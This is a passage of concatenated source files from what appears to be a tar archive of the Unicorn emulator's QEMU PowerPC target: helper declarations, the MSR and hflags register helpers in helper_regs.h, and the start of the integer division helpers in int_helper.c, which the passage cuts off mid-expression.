DEF_HELPER_4(xscvqpsdz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpswz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpudz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpuwz, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvhpdp, void, env, vsr, vsr) DEF_HELPER_4(xscvsdqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvspdp, void, env, vsr, vsr) DEF_HELPER_2(xscvspdpn, i64, env, i64) DEF_HELPER_3(xscvdpsxds, void, env, vsr, vsr) DEF_HELPER_3(xscvdpsxws, void, env, vsr, vsr) DEF_HELPER_3(xscvdpuxds, void, env, vsr, vsr) DEF_HELPER_3(xscvdpuxws, void, env, vsr, vsr) DEF_HELPER_3(xscvsxddp, void, env, vsr, vsr) DEF_HELPER_3(xscvuxdsp, void, env, vsr, vsr) DEF_HELPER_3(xscvsxdsp, void, env, vsr, vsr) DEF_HELPER_4(xscvudqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvuxddp, void, env, vsr, vsr) DEF_HELPER_3(xststdcsp, void, env, i32, vsr) DEF_HELPER_2(xststdcdp, void, env, i32) DEF_HELPER_2(xststdcqp, void, env, i32) DEF_HELPER_3(xsrdpi, void, env, vsr, vsr) DEF_HELPER_3(xsrdpic, void, env, vsr, vsr) DEF_HELPER_3(xsrdpim, void, env, vsr, vsr) DEF_HELPER_3(xsrdpip, void, env, vsr, vsr) DEF_HELPER_3(xsrdpiz, void, env, vsr, vsr) DEF_HELPER_4(xsrqpi, void, env, i32, vsr, vsr) DEF_HELPER_4(xsrqpxp, void, env, i32, vsr, vsr) DEF_HELPER_4(xssqrtqp, void, env, i32, vsr, vsr) DEF_HELPER_5(xssubqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xsaddsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xssubsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmulsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsdivsp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xsresp, void, env, vsr, vsr) DEF_HELPER_2(xsrsp, i64, env, i64) DEF_HELPER_3(xssqrtsp, void, env, vsr, vsr) DEF_HELPER_3(xsrsqrtesp, void, env, vsr, vsr) DEF_HELPER_5(xsmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xvadddp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvsubdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmuldp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvdivdp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xvredp, void, env, vsr, vsr) DEF_HELPER_3(xvsqrtdp, void, env, vsr, vsr) DEF_HELPER_3(xvrsqrtedp, void, env, vsr, vsr) DEF_HELPER_4(xvtdivdp, void, env, i32, vsr, vsr) DEF_HELPER_3(xvtsqrtdp, void, env, i32, vsr) DEF_HELPER_5(xvmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xvmaxdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmindp, void, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpeqdp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgedp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgtdp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpnedp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_3(xvcvdpsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpsxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpsxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpuxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpuxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxddp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxddp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxwdp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxwdp, void, env, vsr, vsr) DEF_HELPER_3(xvrdpi, void, env, vsr, vsr) DEF_HELPER_3(xvrdpic, void, env, vsr, vsr) DEF_HELPER_3(xvrdpim, void, env, vsr, vsr) DEF_HELPER_3(xvrdpip, void, env, vsr, vsr) DEF_HELPER_3(xvrdpiz, void, env, vsr, vsr) DEF_HELPER_4(xvaddsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvsubsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmulsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvdivsp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xvresp, void, env, vsr, vsr) DEF_HELPER_3(xvsqrtsp, void, env, vsr, vsr) DEF_HELPER_3(xvrsqrtesp, void, env, vsr, vsr) DEF_HELPER_4(xvtdivsp, void, env, i32, vsr, vsr) DEF_HELPER_3(xvtsqrtsp, void, env, i32, vsr) DEF_HELPER_5(xvmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xvmaxsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvminsp, void, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpeqsp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgesp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgtsp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpnesp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_3(xvcvspdp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsphp, void, env, vsr, vsr) DEF_HELPER_3(xvcvhpsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvspsxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvspsxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvspuxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvspuxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxdsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxdsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxwsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxwsp, void, env, vsr, vsr) DEF_HELPER_2(xvtstdcsp, void, env, i32) DEF_HELPER_2(xvtstdcdp, void, env, i32) DEF_HELPER_3(xvrspi, void, env, vsr, vsr) DEF_HELPER_3(xvrspic, void, env, vsr, vsr) DEF_HELPER_3(xvrspim, void, env, vsr, vsr) DEF_HELPER_3(xvrspip, void, env, vsr, vsr) DEF_HELPER_3(xvrspiz, void, env, vsr, vsr) DEF_HELPER_4(xxperm, void, env, vsr, vsr, vsr) DEF_HELPER_4(xxpermr, void, env, vsr, vsr, vsr) DEF_HELPER_4(xxextractuw, void, env, vsr, vsr, i32) DEF_HELPER_4(xxinsertw, void, env, vsr, vsr, i32) DEF_HELPER_3(xvxsigsp, void, env, vsr, vsr) DEF_HELPER_2(efscfsi, i32, env, i32) DEF_HELPER_2(efscfui, i32, env, i32) DEF_HELPER_2(efscfuf, i32, env, i32) DEF_HELPER_2(efscfsf, i32, env, i32) DEF_HELPER_2(efsctsi, i32, env, i32) DEF_HELPER_2(efsctui, i32, env, i32) DEF_HELPER_2(efsctsiz, i32, env, i32) DEF_HELPER_2(efsctuiz, i32, env, i32) DEF_HELPER_2(efsctsf, i32, env, i32) DEF_HELPER_2(efsctuf, i32, env, i32) DEF_HELPER_2(evfscfsi, i64, env, i64) DEF_HELPER_2(evfscfui, i64, env, i64) DEF_HELPER_2(evfscfuf, i64, env, i64) DEF_HELPER_2(evfscfsf, i64, env, i64) DEF_HELPER_2(evfsctsi, i64, env, i64) DEF_HELPER_2(evfsctui, i64, env, i64) DEF_HELPER_2(evfsctsiz, i64, env, i64) DEF_HELPER_2(evfsctuiz, i64, env, i64) DEF_HELPER_2(evfsctsf, i64, env, i64) DEF_HELPER_2(evfsctuf, i64, env, i64) DEF_HELPER_3(efsadd, i32, env, i32, i32) DEF_HELPER_3(efssub, i32, env, i32, i32) DEF_HELPER_3(efsmul, i32, env, i32, i32) DEF_HELPER_3(efsdiv, i32, env, i32, i32) DEF_HELPER_3(evfsadd, i64, env, i64, i64) DEF_HELPER_3(evfssub, i64, env, i64, i64) DEF_HELPER_3(evfsmul, i64, env, i64, i64) DEF_HELPER_3(evfsdiv, i64, env, i64, i64) DEF_HELPER_3(efststlt, i32, env, i32, i32) DEF_HELPER_3(efststgt, i32, env, i32, i32) DEF_HELPER_3(efststeq, i32, env, i32, i32) DEF_HELPER_3(efscmplt, i32, env, i32, i32) DEF_HELPER_3(efscmpgt, i32, env, i32, i32) DEF_HELPER_3(efscmpeq, i32, env, i32, i32) DEF_HELPER_3(evfststlt, i32, env, i64, i64) DEF_HELPER_3(evfststgt, i32, env, i64, i64) DEF_HELPER_3(evfststeq, i32, env, i64, i64) DEF_HELPER_3(evfscmplt, i32, env, i64, i64) DEF_HELPER_3(evfscmpgt, i32, env, i64, i64) DEF_HELPER_3(evfscmpeq, i32, env, i64, i64) DEF_HELPER_2(efdcfsi, i64, env, i32) DEF_HELPER_2(efdcfsid, i64, env, i64) DEF_HELPER_2(efdcfui, i64, env, i32) DEF_HELPER_2(efdcfuid, i64, env, i64) DEF_HELPER_2(efdctsi, i32, env, i64) DEF_HELPER_2(efdctui, i32, env, i64) DEF_HELPER_2(efdctsiz, i32, env, i64) DEF_HELPER_2(efdctsidz, i64, env, i64) DEF_HELPER_2(efdctuiz, i32, env, i64) DEF_HELPER_2(efdctuidz, i64, env, i64) DEF_HELPER_2(efdcfsf, i64, env, i32) DEF_HELPER_2(efdcfuf, i64, env, i32) DEF_HELPER_2(efdctsf, i32, env, i64) DEF_HELPER_2(efdctuf, i32, env, i64) DEF_HELPER_2(efscfd, i32, env, i64) DEF_HELPER_2(efdcfs, i64, env, i32) DEF_HELPER_3(efdadd, i64, env, i64, i64) DEF_HELPER_3(efdsub, i64, env, i64, i64) DEF_HELPER_3(efdmul, i64, env, i64, i64) DEF_HELPER_3(efddiv, i64, env, i64, i64) DEF_HELPER_3(efdtstlt, i32, env, i64, i64) DEF_HELPER_3(efdtstgt, i32, env, i64, i64) DEF_HELPER_3(efdtsteq, i32, env, i64, i64) DEF_HELPER_3(efdcmplt, i32, env, i64, i64) DEF_HELPER_3(efdcmpgt, i32, env, i64, i64) DEF_HELPER_3(efdcmpeq, i32, env, i64, i64) DEF_HELPER_2(4xx_tlbre_hi, tl, env, tl) DEF_HELPER_2(4xx_tlbre_lo, tl, env, tl) DEF_HELPER_3(4xx_tlbwe_hi, void, env, tl, tl) DEF_HELPER_3(4xx_tlbwe_lo, void, env, tl, tl) DEF_HELPER_2(4xx_tlbsx, tl, env, tl) DEF_HELPER_3(440_tlbre, tl, env, i32, tl) DEF_HELPER_4(440_tlbwe, void, env, i32, tl, tl) DEF_HELPER_2(440_tlbsx, tl, env, tl) DEF_HELPER_1(booke206_tlbre, void, env) DEF_HELPER_1(booke206_tlbwe, void, env) DEF_HELPER_2(booke206_tlbsx, void, env, tl) DEF_HELPER_2(booke206_tlbivax, void, env, tl) DEF_HELPER_2(booke206_tlbilx0, void, env, tl) DEF_HELPER_2(booke206_tlbilx1, void, env, tl) DEF_HELPER_2(booke206_tlbilx3, void, env, tl) DEF_HELPER_2(booke206_tlbflush, void, env, tl) DEF_HELPER_3(booke_setpid, void, env, i32, tl) DEF_HELPER_2(booke_set_eplc, void, env, tl) DEF_HELPER_2(booke_set_epsc, void, env, tl) DEF_HELPER_2(6xx_tlbd, void, env, tl) DEF_HELPER_2(6xx_tlbi, void, env, tl) DEF_HELPER_2(74xx_tlbd, void, env, tl) DEF_HELPER_2(74xx_tlbi, void, env, tl) DEF_HELPER_FLAGS_1(tlbia, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(tlbie, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(tlbiva, TCG_CALL_NO_RWG, void, env, tl) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_3(store_slb, TCG_CALL_NO_RWG, void, env, tl, tl) DEF_HELPER_2(load_slb_esid, tl, env, tl) DEF_HELPER_2(load_slb_vsid, tl, env, tl) DEF_HELPER_2(find_slb_vsid, tl, env, tl) DEF_HELPER_FLAGS_2(slbia, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_2(slbie, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(slbieg, TCG_CALL_NO_RWG, void, env, tl) #endif DEF_HELPER_FLAGS_2(load_sr, TCG_CALL_NO_RWG, tl, env, tl) DEF_HELPER_FLAGS_3(store_sr, TCG_CALL_NO_RWG, void, env, tl, tl) DEF_HELPER_FLAGS_1(602_mfrom, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_2(msgsnd, void, env, tl) DEF_HELPER_2(msgclr, void, env, tl) DEF_HELPER_2(book3s_msgsnd, void, env, tl) DEF_HELPER_2(book3s_msgclr, void, env, tl) DEF_HELPER_4(dlmzb, tl, env, tl, tl, i32) DEF_HELPER_FLAGS_2(clcs, TCG_CALL_NO_RWG_SE, tl, env, i32) DEF_HELPER_2(rac, tl, env, tl) DEF_HELPER_3(div, tl, env, tl, tl) DEF_HELPER_3(divo, tl, env, tl, tl) DEF_HELPER_3(divs, tl, env, tl, tl) DEF_HELPER_3(divso, tl, env, tl, tl) DEF_HELPER_2(load_dcr, tl, env, tl) DEF_HELPER_3(store_dcr, void, env, tl, tl) DEF_HELPER_2(load_dump_spr, void, env, i32) DEF_HELPER_2(store_dump_spr, void, env, i32) DEF_HELPER_4(fscr_facility_check, void, env, i32, i32, i32) DEF_HELPER_4(msr_facility_check, void, env, i32, i32, i32) DEF_HELPER_FLAGS_1(load_tbl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_tbu, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_atbl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_atbu, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_vtb, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_601_rtcl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_601_rtcu, TCG_CALL_NO_RWG, tl, env) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_1(load_purr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_purr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_ptcr, void, env, tl) DEF_HELPER_FLAGS_1(load_dpdes, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_dpdes, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(book3s_msgsndp, void, env, tl) DEF_HELPER_2(book3s_msgclrp, void, env, tl) #endif DEF_HELPER_2(store_sdr1, void, env, tl) DEF_HELPER_2(store_pidr, void, env, tl) DEF_HELPER_2(store_lpidr, void, env, tl) DEF_HELPER_FLAGS_2(store_tbl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_tbu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_atbl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_atbu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_601_rtcl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_601_rtcu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_1(load_decr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_decr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_1(load_hdecr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_hdecr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_vtb, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_tbu40, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_hid0_601, void, env, tl) DEF_HELPER_3(store_403_pbr, void, env, i32, tl) DEF_HELPER_FLAGS_1(load_40x_pit, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_40x_pit, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_40x_dbcr0, void, env, tl) DEF_HELPER_2(store_40x_sler, void, env, tl) DEF_HELPER_FLAGS_2(store_booke_tcr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_booke_tsr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_3(store_ibatl, void, env, i32, tl) DEF_HELPER_3(store_ibatu, void, env, i32, tl) DEF_HELPER_3(store_dbatl, void, env, i32, tl) DEF_HELPER_3(store_dbatu, void, env, i32, tl) DEF_HELPER_3(store_601_batl, void, env, i32, tl) DEF_HELPER_3(store_601_batu, void, env, i32, tl) #define dh_alias_fprp ptr #define dh_ctype_fprp ppc_fprp_t * #define dh_is_signed_fprp dh_is_signed_ptr DEF_HELPER_4(dadd, void, env, fprp, fprp, fprp) DEF_HELPER_4(daddq, void, env, fprp, fprp, fprp) DEF_HELPER_4(dsub, void, env, fprp, fprp, fprp) DEF_HELPER_4(dsubq, void, env, fprp, fprp, fprp) DEF_HELPER_4(dmul, void, env, fprp, fprp, fprp) DEF_HELPER_4(dmulq, void, env, fprp, fprp, fprp) DEF_HELPER_4(ddiv, void, env, fprp, fprp, fprp) DEF_HELPER_4(ddivq, void, env, fprp, fprp, fprp) DEF_HELPER_3(dcmpo, i32, env, fprp, fprp) DEF_HELPER_3(dcmpoq, i32, env, fprp, fprp) DEF_HELPER_3(dcmpu, i32, env, fprp, fprp) DEF_HELPER_3(dcmpuq, i32, env, fprp, fprp) DEF_HELPER_3(dtstdc, i32, env, fprp, i32) DEF_HELPER_3(dtstdcq, i32, env, fprp, i32) DEF_HELPER_3(dtstdg, i32, env, fprp, i32) DEF_HELPER_3(dtstdgq, i32, env, fprp, i32) DEF_HELPER_3(dtstex, i32, env, fprp, fprp) DEF_HELPER_3(dtstexq, i32, env, fprp, fprp) DEF_HELPER_3(dtstsf, i32, env, fprp, fprp) DEF_HELPER_3(dtstsfq, i32, env, fprp, fprp) DEF_HELPER_3(dtstsfi, i32, env, i32, fprp) DEF_HELPER_3(dtstsfiq, i32, env, i32, fprp) DEF_HELPER_5(dquai, void, env, fprp, fprp, i32, i32) DEF_HELPER_5(dquaiq, void, env, fprp, fprp, i32, i32) DEF_HELPER_5(dqua, void, env, fprp, fprp, fprp, i32) DEF_HELPER_5(dquaq, void, env, fprp, fprp, fprp, i32) DEF_HELPER_5(drrnd, void, env, fprp, fprp, fprp, i32) DEF_HELPER_5(drrndq, void, env, fprp, fprp, fprp, i32) DEF_HELPER_5(drintx, void, env, fprp, fprp, i32, i32) DEF_HELPER_5(drintxq, void, env, fprp, fprp, i32, i32) DEF_HELPER_5(drintn, void, env, fprp, fprp, i32, i32) DEF_HELPER_5(drintnq, void, env, fprp, fprp, i32, i32) DEF_HELPER_3(dctdp, void, env, fprp, fprp) DEF_HELPER_3(dctqpq, void, env, fprp, fprp) DEF_HELPER_3(drsp, void, env, fprp, fprp) DEF_HELPER_3(drdpq, void, env, fprp, fprp) DEF_HELPER_3(dcffix, void, env, fprp, fprp) DEF_HELPER_3(dcffixq, void, env, fprp, fprp) DEF_HELPER_3(dctfix, void, env, fprp, fprp) DEF_HELPER_3(dctfixq, void, env, fprp, fprp) DEF_HELPER_4(ddedpd, void, env, fprp, fprp, i32) DEF_HELPER_4(ddedpdq, void, env, fprp, fprp, i32) DEF_HELPER_4(denbcd, void, env, fprp, fprp, i32) DEF_HELPER_4(denbcdq, void, env, fprp, fprp, i32) DEF_HELPER_3(dxex, void, env, fprp, fprp) DEF_HELPER_3(dxexq, void, env, fprp, fprp) DEF_HELPER_4(diex, void, env, fprp, fprp, fprp) DEF_HELPER_4(diexq, void, env, fprp, fprp, fprp) DEF_HELPER_4(dscri, void, env, fprp, fprp, i32) DEF_HELPER_4(dscriq, void, env, fprp, fprp, i32) DEF_HELPER_4(dscli, void, env, fprp, fprp, i32) DEF_HELPER_4(dscliq, void, env, fprp, fprp, i32) DEF_HELPER_1(tbegin, void, env) DEF_HELPER_FLAGS_1(fixup_thrm, TCG_CALL_NO_RWG, void, env) #ifdef TARGET_PPC64 DEF_HELPER_FLAGS_3(lq_le_parallel, TCG_CALL_NO_WG, i64, env, tl, i32) DEF_HELPER_FLAGS_3(lq_be_parallel, TCG_CALL_NO_WG, i64, env, tl, i32) DEF_HELPER_FLAGS_5(stq_le_parallel, TCG_CALL_NO_WG, void, env, tl, i64, i64, i32) DEF_HELPER_FLAGS_5(stq_be_parallel, TCG_CALL_NO_WG, void, env, tl, i64, i64, i32) DEF_HELPER_5(stqcx_le_parallel, i32, env, tl, i64, i64, i32) DEF_HELPER_5(stqcx_be_parallel, i32, env, tl, i64, i64, i32) #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/helper_regs.h���������������������������������������������������������0000664�0000000�0000000�00000013346�14675241067�0020702�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC emulation special registers manipulation helpers for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef HELPER_REGS_H #define HELPER_REGS_H #include "exec/exec-all.h" /* Swap temporary saved registers with GPRs */ static inline void hreg_swap_gpr_tgpr(CPUPPCState *env) { target_ulong tmp; tmp = env->gpr[0]; env->gpr[0] = env->tgpr[0]; env->tgpr[0] = tmp; tmp = env->gpr[1]; env->gpr[1] = env->tgpr[1]; env->tgpr[1] = tmp; tmp = env->gpr[2]; env->gpr[2] = env->tgpr[2]; env->tgpr[2] = tmp; tmp = env->gpr[3]; env->gpr[3] = env->tgpr[3]; env->tgpr[3] = tmp; } static inline void hreg_compute_mem_idx(CPUPPCState *env) { /* * This is our encoding for server processors. The architecture * specifies that there is no such thing as userspace with * translation off, however it appears that MacOS does it and some * 32-bit CPUs support it. Weird... * * 0 = Guest User space virtual mode * 1 = Guest Kernel space virtual mode * 2 = Guest User space real mode * 3 = Guest Kernel space real mode * 4 = HV User space virtual mode * 5 = HV Kernel space virtual mode * 6 = HV User space real mode * 7 = HV Kernel space real mode * * For BookE, we need 8 MMU modes as follow: * * 0 = AS 0 HV User space * 1 = AS 0 HV Kernel space * 2 = AS 1 HV User space * 3 = AS 1 HV Kernel space * 4 = AS 0 Guest User space * 5 = AS 0 Guest Kernel space * 6 = AS 1 Guest User space * 7 = AS 1 Guest Kernel space */ if (env->mmu_model & POWERPC_MMU_BOOKE) { env->immu_idx = env->dmmu_idx = msr_pr ? 0 : 1; env->immu_idx += msr_is ? 2 : 0; env->dmmu_idx += msr_ds ? 2 : 0; env->immu_idx += msr_gs ? 4 : 0; env->dmmu_idx += msr_gs ? 4 : 0; } else { env->immu_idx = env->dmmu_idx = msr_pr ? 0 : 1; env->immu_idx += msr_ir ? 0 : 2; env->dmmu_idx += msr_dr ? 0 : 2; env->immu_idx += msr_hv ? 4 : 0; env->dmmu_idx += msr_hv ? 4 : 0; } } static inline void hreg_compute_hflags(CPUPPCState *env) { target_ulong hflags_mask; /* We 'forget' FE0 & FE1: we'll never generate imprecise exceptions */ hflags_mask = (1 << MSR_VR) | (1 << MSR_AP) | (1 << MSR_SA) | (1 << MSR_PR) | (1 << MSR_FP) | (1 << MSR_SE) | (1 << MSR_BE) | (1 << MSR_LE) | (1 << MSR_VSX) | (1 << MSR_IR) | (1 << MSR_DR); hflags_mask |= (1ULL << MSR_CM) | (1ULL << MSR_SF) | MSR_HVB; hreg_compute_mem_idx(env); env->hflags = env->msr & hflags_mask; /* Merge with hflags coming from other registers */ env->hflags |= env->hflags_nmsr; } static inline void cpu_interrupt_exittb(CPUState *cs) { cpu_interrupt(cs, CPU_INTERRUPT_EXITTB); } static inline int hreg_store_msr(CPUPPCState *env, target_ulong value, int alter_hv) { int excp; CPUState *cs = env_cpu(env); excp = 0; value &= env->msr_mask; /* Neither mtmsr nor guest state can alter HV */ if (!alter_hv || !(env->msr & MSR_HVB)) { value &= ~MSR_HVB; value |= env->msr & MSR_HVB; } if (((value >> MSR_IR) & 1) != msr_ir || ((value >> MSR_DR) & 1) != msr_dr) { cpu_interrupt_exittb(cs); } if ((env->mmu_model & POWERPC_MMU_BOOKE) && ((value >> MSR_GS) & 1) != msr_gs) { cpu_interrupt_exittb(cs); } if (unlikely((env->flags & POWERPC_FLAG_TGPR) && ((value ^ env->msr) & (1 << MSR_TGPR)))) { /* Swap temporary saved registers with GPRs */ hreg_swap_gpr_tgpr(env); } if (unlikely((value >> MSR_EP) & 1) != msr_ep) { /* Change the exception prefix on PowerPC 601 */ env->excp_prefix = ((value >> MSR_EP) & 1) * 0xFFF00000; } /* * If PR=1 then EE, IR and DR must be 1 * * Note: We only enforce this on 64-bit server processors. * It appears that: * - 32-bit implementations supports PR=1 and EE/DR/IR=0 and MacOS * exploits it. * - 64-bit embedded implementations do not need any operation to be * performed when PR is set. */ if (is_book3s_arch2x(env) && ((value >> MSR_PR) & 1)) { value |= (1 << MSR_EE) | (1 << MSR_DR) | (1 << MSR_IR); } env->msr = value; hreg_compute_hflags(env); if (unlikely(msr_pow == 1)) { if (!env->pending_interrupts && (*env->check_pow)(env)) { cs->halted = 1; excp = EXCP_HALTED; } } return excp; } static inline void check_tlb_flush(CPUPPCState *env, bool global) { CPUState *cs = env_cpu(env); /* Handle global flushes first */ if (global && (env->tlb_need_flush & TLB_NEED_GLOBAL_FLUSH)) { env->tlb_need_flush &= ~TLB_NEED_GLOBAL_FLUSH; env->tlb_need_flush &= ~TLB_NEED_LOCAL_FLUSH; tlb_flush_all_cpus_synced(cs); return; } /* Then handle local ones */ if (env->tlb_need_flush & TLB_NEED_LOCAL_FLUSH) { env->tlb_need_flush &= ~TLB_NEED_LOCAL_FLUSH; tlb_flush(cs); } } #endif /* HELPER_REGS_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/int_helper.c����������������������������������������������������������0000664�0000000�0000000�00000262362�14675241067�0020533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC integer and vector emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "crypto/aes.h" #include "fpu/softfloat.h" #include "qemu/guest-random.h" #include "helper_regs.h" /*****************************************************************************/ /* Fixed point operations helpers */ static inline void helper_update_ov_legacy(CPUPPCState *env, int ov) { if (unlikely(ov)) { env->so = env->ov = 1; } else { env->ov = 0; } } target_ulong helper_divweu(CPUPPCState *env, target_ulong ra, target_ulong rb, uint32_t oe) { uint64_t rt = 0; int overflow = 0; uint64_t dividend = (uint64_t)ra << 32; uint64_t divisor = (uint32_t)rb; if (unlikely(divisor == 0)) { overflow = 1; } else { rt = dividend / divisor; overflow = rt > UINT32_MAX; } if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return (target_ulong)rt; } target_ulong helper_divwe(CPUPPCState *env, target_ulong ra, target_ulong rb, uint32_t oe) { int64_t rt = 0; int overflow = 0; int64_t dividend = (int64_t)ra << 32; int64_t divisor = (int64_t)((int32_t)rb); #ifdef _MSC_VER if (unlikely((divisor == 0) || ((divisor == (0ULL - 1ULL)) && (dividend == 